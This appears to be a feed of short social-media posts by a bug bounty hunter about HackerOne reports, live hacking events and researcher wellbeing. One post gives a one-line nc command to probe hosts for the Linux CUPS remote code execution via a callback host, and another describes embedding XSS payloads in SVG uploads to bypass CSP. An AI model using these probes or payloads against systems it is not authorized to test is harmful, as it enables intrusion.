I submitted my most critical bug yet on @Hacker0x01 . Lets see how it goes!.

RT @rez0__: You should sleep more. I know it’s cliche to talk about, but hear me out. I love staying up late, especially while hacking. B….

RT @cybersecmeg: me, when cybersecurity was the center of my life: exhausted, burnt-out, struggling to balance my friends and family, menta….

Just logged into Rocket League to see the white hat topper on my account. Still one of the coolest swag items from the Epic live event. #rocketleague #epicgames

What is your highest bounty for an informative report?. This one is from last year's h1-305 LHE.

One day, the technique for exploiting this vulnerability will be available. Not today, but one day. Working with other bug hunters makes a huge difference. Two minds bouncing ideas off each other leads to peak efficiency.

RT @ArchAngelDDay: How cool & chill is the #bugbounty community, when we enjoy helping eachother out more than money?! fr fr. Thanks again….

Thought I'd share this remote code execution on one of the main sites for a large H1 target from a year ago. I found this one by being persistent and using Param Miner by @albinowax . After Param Miner discovered the header it was all manual testing to detect the template engine

Command line PoC to detect the Linux Cups RCE. If a host is vulnerable requests will hit your callback host. echo -n "0 3 http://{yourcallback}:80/printers/whatever" | nc -u {target} 631. #rce #bugbounty #bugbountytips #hackerone #infosec #hacking #ethicalhacking #infosec.

RT @jobertabma: nobody will remember:. - your bounty earnings.- how “busy you were”.- how many hours you worked. people will remember:. - y….

Attending H1-702 in Person again. Excited to see you all there. Favorite LHE location.

Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600"

Submitted two catastrophic critical reports on two public @Hacker0x01 programs today. If all goes well I am considering partial disclosure on one of them once the report is resolved. #bugbounty #hackforgood.

RT @RootMoksha: SSTI (Server Side Template Injection) Payload List .Credit:@Botami143.#bugbountytips #bugbounty

I am so happy and thankful to take home my first LHE trophy on @Hacker0x01. Executioner of #H1305 - most impactful report. I cannot disclose details but the bug is a cool one!. Shout-out to all the friends I talked to and the new faces as well 💪😎 keep up the good work.